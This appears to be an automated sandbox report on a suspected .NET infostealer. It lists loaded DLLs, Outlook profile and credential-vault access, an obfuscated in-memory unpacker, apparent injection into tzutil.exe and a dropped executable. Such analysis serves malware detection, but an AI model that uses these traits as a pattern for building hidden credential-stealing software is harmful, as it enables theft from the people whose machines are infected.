Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 3qsTcL9MOT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 3qsTcL9MOT.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 3qsTcL9MOT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tzutil.pdbGCTL source: 3qsTcL9MOT.exe, 00000003.00000002.2291660238.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, GxqFOvQfqyr.exe, 00000005.00000002.4510143663.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GxqFOvQfqyr.exe, 00000005.00000000.2213468950.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, GxqFOvQfqyr.exe, 00000007.00000000.2362687473.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: Slqn.pdb source: 3qsTcL9MOT.exe
Source:	Binary string: Slqn.pdbSHA256 source: 3qsTcL9MOT.exe
Source:	Binary string: wntdll.pdbUGP source: 3qsTcL9MOT.exe, 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2291509805.000000000379C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2297530707.0000000003941000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 3qsTcL9MOT.exe, 3qsTcL9MOT.exe, 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000003.2291509805.000000000379C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2297530707.0000000003941000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: tzutil.pdb source: 3qsTcL9MOT.exe, 00000003.00000002.2291660238.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, GxqFOvQfqyr.exe, 00000005.00000002.4510143663.00000000011E8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 3qsTcL9MOT.exe, MainForm.cs	.Net Code: InitializeComponent
Source: 0.2.3qsTcL9MOT.exe.3419928.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.3qsTcL9MOT.exe.33bd99c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	.Net Code: BCQsIACiWx System.Reflection.Assembly.Load(byte[])
Source: 0.2.3qsTcL9MOT.exe.33ca1c4.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.3qsTcL9MOT.exe.340c778.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	.Net Code: BCQsIACiWx System.Reflection.Assembly.Load(byte[])
Source: 0.2.3qsTcL9MOT.exe.7940000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 6.2.tzutil.exe.411cd14.2.raw.unpack, MainForm.cs	.Net Code: InitializeComponent
Source: 7.2.GxqFOvQfqyr.exe.2a5cd14.1.raw.unpack, MainForm.cs	.Net Code: InitializeComponent
Source: 7.0.GxqFOvQfqyr.exe.2a5cd14.1.raw.unpack, MainForm.cs	.Net Code: InitializeComponent
Source: 9.2.firefox.exe.1377cd14.0.raw.unpack, MainForm.cs	.Net Code: InitializeComponent

Source: 3qsTcL9MOT.exe

Static PE information: 0xD87B04DC [Fri Feb 2 08:27:08 2085 UTC]

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 0_2_0335EB08 pushfd ; iretd	0_2_0335EB09
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_004030F0 push eax; ret	3_2_004030F2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_004121CC push 0000006Eh; retf	3_2_004121DD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0041428F push 78B5E34Ch; iretd	3_2_004142B4
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0041845E pushfd ; iretd	3_2_00418466
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00418DCF push edi; ret	3_2_00418DD6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00417DE4 push eax; iretd	3_2_00417DE5
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00415E23 push ecx; retf	3_2_00415E43
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00401ED6 push esi; ret	3_2_00401ED7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0041A6DD push eax; ret	3_2_0041A6DE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0041A741 push ebp; iretd	3_2_0041A743
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0040CF89 pushfd ; ret	3_2_0040CF8B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00FE225F pushad ; ret	3_2_00FE27F9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00FE27FA pushad ; ret	3_2_00FE27F9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010109AD push ecx; mov dword ptr [esp], ecx	3_2_010109B6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00FE283D push eax; iretd	3_2_00FE2858
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00FE1368 push eax; iretd	3_2_00FE1369
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0321120A push ebp; iretd	5_2_0321120C
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_03203A52 pushfd ; ret	5_2_03203A54
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_032111A6 push eax; ret	5_2_032111A7
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320E8AD push eax; iretd	5_2_0320E8AE
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320F898 push edi; ret	5_2_0320F89F
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320C8EB push ecx; retf	5_2_0320C90C
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320C8EC push ecx; retf	5_2_0320C90C
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320EF27 pushfd ; iretd	5_2_0320EF2F
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_03208C95 push 0000006Eh; retf	5_2_03208CA6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B209AD push ecx; mov dword ptr [esp], ecx	6_2_03B209B6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032E4290 push ebp; ret	6_2_032E434A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032CE2E8 push esp; ret	6_2_032CE2EA
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032D2D30 push ecx; retf	6_2_032D2D50
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032D4CF1 push eax; iretd	6_2_032D4CF2

Source: 3qsTcL9MOT.exe

Static PE information: section name: .text entropy: 7.842658445034813

Source: 0.2.3qsTcL9MOT.exe.3419928.2.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.3qsTcL9MOT.exe.3419928.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.3qsTcL9MOT.exe.33bd99c.1.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.3qsTcL9MOT.exe.33bd99c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, MIvkSGXglKO6slR73N.cs	High entropy of concatenated method names: 'DN4uvSJ8wu', 'twIugEeHqQ', 'ejOYSK0kGL', 'bKhYDHR4xj', 'm60Y8dywb9', 'w3dY4h19OA', 'JYoYkn7puw', 'w4BY71Vmjx', 'gEAYfiok1A', 'frCYLugbgh'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, nVfaweiUKcp5tx0QQw.cs	High entropy of concatenated method names: 'dUx5iwEUL7', 'wUL5H0w3bL', 'P5C5ukKGwu', 'jri5rhcKah', 'zwf5o1XVt2', 'ig4umcYliL', 'WYJueiKkwJ', 'WnoubkqJxq', 'RvkupBsXan', 'UUMuJrCPC8'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, dkPMH2seXZ1fHxZFst.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'AQsVJ6DAar', 't3VVN1SuAY', 'V2IVzGc8wF', 'haZqGKOCNy', 'co8qB1oFFA', 'A5HqVInjx3', 'pp6qqZluw9', 'h1mvKfhs6alfxRn7W4i'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	High entropy of concatenated method names: 'c0tqi1WCPM', 'Yq9qZnGpYf', 'tHgqHn4vqh', 'wqeqY3d375', 'zS2qun2kIA', 'sktq5PRYfT', 'VqOqr9NSsr', 'Ah8qodohMO', 'JWJqMq75ak', 'oCUqFwIKGD'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, KdoFKWk2ZYpR3RUAB8.cs	High entropy of concatenated method names: 'qvKr6EpCvh', 'lclrtQd6MX', 'YAHrIw7El6', 'Ojdrw4mMkg', 'zHtrv2DGgv', 'S2jrhsAdc3', 'ULNrgCsZZV', 'bRJr1y2N7J', 'jFSrQ3puln', 'q64rn3bIlE'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, BKOpvVrKJEBTSku9Qv.cs	High entropy of concatenated method names: 'Tq93BZCB4o', 'U7h3quFuVf', 'GP43s6Uvgp', 'x0I3ZiWWko', 'ann3HEYRdU', 'sPJ3ufBLGn', 'kQi35yfScE', 'rOLlbT2C2A', 'cQmlpvw6YT', 'peelJrA69C'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, hE4xOOx5KKlkXkTuo1.cs	High entropy of concatenated method names: 'KmDlZCidRX', 'IP7lHThpKW', 'KuylY9OjgM', 'WrZlu26jCS', 'SDJl5TilML', 'kxqlr4TTMC', 'pLhlofJdYb', 'XanlMvv9qA', 'IGilFWvjLR', 'n4plapsuH6'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, a8rXRVlElGWB7m5At4g.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'egxcUXAiSc', 'NYicWYAcyb', 'ypjcjoK0px', 'Kp3cAIQMoS', 'rSIcmjAbf2', 'tmtceRHesB', 'vu7cbGWAXN'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, PgUPrmN9OkyZYhsH6m.cs	High entropy of concatenated method names: 'XQBl2pDqHJ', 'lHil9jWEVH', 'tFMlSBZSCQ', 'CrjlDsFHii', 'e1glUKSZaf', 'scVl8uLaHA', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, m4Z8RgA3BJcvYCtk6u.cs	High entropy of concatenated method names: 'ToString', 'JG0KR7GulM', 'gLhK9N3MoE', 'r1SKS8gur0', 'AOrKD6954x', 'XsBK8DkIuS', 'sUeK48k1RS', 'OEnKkqMKnj', 'LGmK77vXsA', 'iw7KfOsadq'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, hfC9VHFwouJs1J8uLf.cs	High entropy of concatenated method names: 'JNhC1KpU45', 'DxNCQ7ZNcx', 'SiLC2LJXh0', 'k8MC9990AQ', 'V08CDWdqE4', 'Q6HC8XJayu', 'LbeCklGrwm', 'VfMC7fdyR8', 'JyuCLtaYUi', 'kMsCRNLjqP'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, bUuFVTVCE7ddmiZVNH.cs	High entropy of concatenated method names: 'PmSrZOJ8JK', 'cblrYVSWxg', 'Sqsr50QRW2', 'JkH5NRFFuF', 'yge5z26Ydk', 'NY0rGRwxrb', 'aONrBE1qkM', 'EQArVQkQx4', 'bnxrqwsKLs', 'fXRrscKVQS'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, XsbEF1CyVZU6qSkjqs.cs	High entropy of concatenated method names: 'TA9EF3Pu8i', 'e3QEaij1kE', 'ToString', 'T2YEZSoh9D', 'hDWEHyDmCp', 'DF2EYsRnOp', 'AoGEuPaJQB', 'ID7E5gcJZ3', 'AQuErXxOtq', 'xqBEobfGtn'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, MysLsmpWAbRFA4GZva.cs	High entropy of concatenated method names: 'Dispose', 'KqABJb1NnC', 'qV6V95i1Ya', 'vtOxx2imxd', 'E9dBN3aPRM', 'gPVBzFMWen', 'ProcessDialogKey', 'dk9VGhAEQW', 'sPZVBtJOjw', 'OM2VVyu92x'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, C8gfGJ2tSRIJmw7fXi.cs	High entropy of concatenated method names: 'w8ndL97vCq', 'bNCdOGNt9B', 'F7BdUtEqMr', 'OWfdWvZbTM', 'IX8d9kAJqQ', 'lqtdSHwuhP', 'CQPdDi0q5h', 'iEcd85X4Cx', 'y0wd4dJGdM', 'EK7dkybwIq'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, yaC5dx9LwQox17wUZp.cs	High entropy of concatenated method names: 'aORHUEMQnv', 'H7wHWMrad9', 'nh9HjhVdvL', 'Hb8HAHrJSA', 'CnDHmqObwN', 'D1HHe72Z3L', 'rGJHbwMRjt', 'T9cHpoa6Db', 'hZpHJUMJSH', 'fX9HNZVPBU'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, BHvYSWLZdTOvp6RQxf.cs	High entropy of concatenated method names: 'eneBrTTBWB', 'bg0BoXJ5wa', 'ARJBFV6YNv', 'XRWBahRlNg', 'V9FBdIFbEW', 'OZXBKVQxUc', 'Gp0We53YHNbgB90PVj', 'BgbwLJkbO4f5Jmfeod', 'bKJBBhwmeI', 'TtCBqWmuBX'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, Qfrm0GaQm1L7jwfQEy.cs	High entropy of concatenated method names: 'GtNIKtXZh', 'trWwy1Nnh', 'zrOh99GIh', 'Hodg3Ssm0', 'agHQXciiS', 'InVnO4N30', 'wb6mjIgvBp50OPwiXW', 'DmKMCUGSXbTgh2Wdn9', 'pXqlUkqRS', 'Fguc9MxdL'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, pCu2SgwR82MTin2i3r.cs	High entropy of concatenated method names: 'mVVEp3xtay', 'iJfENMhs9B', 'scmlGaGbS0', 'VD0lBwIUNm', 'QLhER2EiWw', 'eCwEOZJovk', 'E1KE0RWqGj', 'SHuEUeI5WU', 'j2vEWn7W33', 'AshEjLctdb'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, R1Ca9Rlo0vFWlFHxnyg.cs	High entropy of concatenated method names: 'GCW36mN8yR', 'L6c3tqm669', 'VCn3IXxgVB', 'ld43w7WTQp', 'zou3vxPH68', 'DQK3hOf7HQ', 'inr3gQ500p', 'AcW31ScUKo', 'r6c3QBcEiT', 'cbV3nIqEht'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, Hl1BRtYQMlWmxYZHgZ.cs	High entropy of concatenated method names: 'XIvYwPvhl7', 'MPeYhhXEg7', 'jAPY1SAmDv', 'c5wYQBBF4D', 'EitYdVlLJU', 'wPpYKVd8FJ', 'BShYESWjyx', 'c5MYlxul5J', 'XV8Y357EtF', 'M5nYcS9NtQ'
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, lFeBdVzAcr4lSCpxo5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KeS3CX1v5o', 'vAB3dPypqJ', 'wNr3KmncAM', 'UEB3ESb14v', 'WlG3lp1I01', 'wDo336RolW', 'P863cqPI0l'
Source: 0.2.3qsTcL9MOT.exe.33ca1c4.3.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.3qsTcL9MOT.exe.33ca1c4.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.3qsTcL9MOT.exe.340c778.0.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.3qsTcL9MOT.exe.340c778.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, MIvkSGXglKO6slR73N.cs	High entropy of concatenated method names: 'DN4uvSJ8wu', 'twIugEeHqQ', 'ejOYSK0kGL', 'bKhYDHR4xj', 'm60Y8dywb9', 'w3dY4h19OA', 'JYoYkn7puw', 'w4BY71Vmjx', 'gEAYfiok1A', 'frCYLugbgh'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, nVfaweiUKcp5tx0QQw.cs	High entropy of concatenated method names: 'dUx5iwEUL7', 'wUL5H0w3bL', 'P5C5ukKGwu', 'jri5rhcKah', 'zwf5o1XVt2', 'ig4umcYliL', 'WYJueiKkwJ', 'WnoubkqJxq', 'RvkupBsXan', 'UUMuJrCPC8'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, dkPMH2seXZ1fHxZFst.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'AQsVJ6DAar', 't3VVN1SuAY', 'V2IVzGc8wF', 'haZqGKOCNy', 'co8qB1oFFA', 'A5HqVInjx3', 'pp6qqZluw9', 'h1mvKfhs6alfxRn7W4i'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	High entropy of concatenated method names: 'c0tqi1WCPM', 'Yq9qZnGpYf', 'tHgqHn4vqh', 'wqeqY3d375', 'zS2qun2kIA', 'sktq5PRYfT', 'VqOqr9NSsr', 'Ah8qodohMO', 'JWJqMq75ak', 'oCUqFwIKGD'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, KdoFKWk2ZYpR3RUAB8.cs	High entropy of concatenated method names: 'qvKr6EpCvh', 'lclrtQd6MX', 'YAHrIw7El6', 'Ojdrw4mMkg', 'zHtrv2DGgv', 'S2jrhsAdc3', 'ULNrgCsZZV', 'bRJr1y2N7J', 'jFSrQ3puln', 'q64rn3bIlE'
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, BKOpvVrKJEBTSku9Qv.cs	High entropy of concatenated method names: 'Tq93BZCB4o', 'U7h3quFuVf', 'GP43s6Uvgp', 'x0I3ZiWWko', 'ann3HEYRdU', 'sPJ3ufBLGn', 'kQi35yfScE', 'rOLlbT2C2A', 'cQmlpvw6YT', 'peelJrA69C'
